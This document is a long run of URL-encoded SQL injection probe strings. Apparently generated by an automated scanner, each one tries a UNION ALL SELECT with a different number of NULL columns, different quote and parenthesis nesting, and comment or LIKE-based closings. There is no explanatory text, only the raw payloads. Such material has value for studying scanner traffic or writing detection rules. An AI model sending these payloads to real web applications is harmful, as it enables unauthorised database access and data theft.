1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27jGfV%27%3D%27jGfV 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27cewS%27%3D%27cewS 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27zHXf%27%3D%27zHXf 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27BFgX%27%3D%27BFgX 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27LfEH%27%3D%27LfEH 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27lscM%27%3D%27lscM 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27hKZp%27%3D%27hKZp 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27rHeB%27%3D%27rHeB 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27xEKI%27%3D%27xEKI 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27eAtq%27%3D%27eAtq 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27waAz%27%3D%27waAz 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27zudS%27%3D%27zudS 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27KpBC%27%3D%27KpBC 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27lDVh%27%3D%27lDVh 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27vuok%27%3D%27vuok 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27yAGX%27%3D%27yAGX 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27FjMg%27%3D%27FjMg 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27jUFu%27%3D%27jUFu 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27qkrM%27%3D%27qkrM 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27azxu%27%3D%27azxu 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27rTaP%27%3D%27rTaP 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27gNHF%27%3D%27gNHF 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27ANRV%27%3D%27ANRV 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27IdnP%27%3D%27IdnP 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27noCm%27%3D%27noCm 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27stkp%27%3D%27stkp 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27wjrb%27%3D%27wjrb 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Hxfh%27%3D%27Hxfh 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27HftD%27%3D%27HftD 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27aBCx%27%3D%27aBCx 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27xrIs%27%3D%27xrIs 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27YRHn%27%3D%27YRHn 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27lQlu%27%3D%27lQlu 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Zmvc%27%3D%27Zmvc 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27MXFT%27%3D%27MXFT 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27gJll%27%20LIKE%20%27gJll 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27Lbdu%27%20LIKE%20%27Lbdu 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27oboZ%27%20LIKE%20%27oboZ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27BbJJ%27%20LIKE%20%27BbJJ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27dgEd%27%20LIKE%20%27dgEd 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27PmDW%27%20LIKE%20%27PmDW 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27bATs%27%20LIKE%20%27bATs 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27gOdy%27%20LIKE%20%27gOdy 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27cWuX%27%20LIKE%20%27cWuX 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27cKzJ%27%20LIKE%20%27cKzJ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27AzOy%27%20LIKE%20%27AzOy 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27HykG%27%20LIKE%20%27HykG 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27xEtR%27%20LIKE%20%27xEtR 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27gIzZ%27%20LIKE%20%27gIzZ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27pVFf%27%20LIKE%20%27pVFf 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ErGQ%27%20LIKE%20%27ErGQ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27eOHI%27%20LIKE%20%27eOHI 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27WOxV%27%20LIKE%20%27WOxV 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27fZQm%27%20LIKE%20%27fZQm 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27eMCI%27%20LIKE%20%27eMCI 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27Suif%27%20LIKE%20%27Suif 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27qUHP%27%20LIKE%20%27qUHP 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27yKwp%27%20LIKE%20%27yKwp 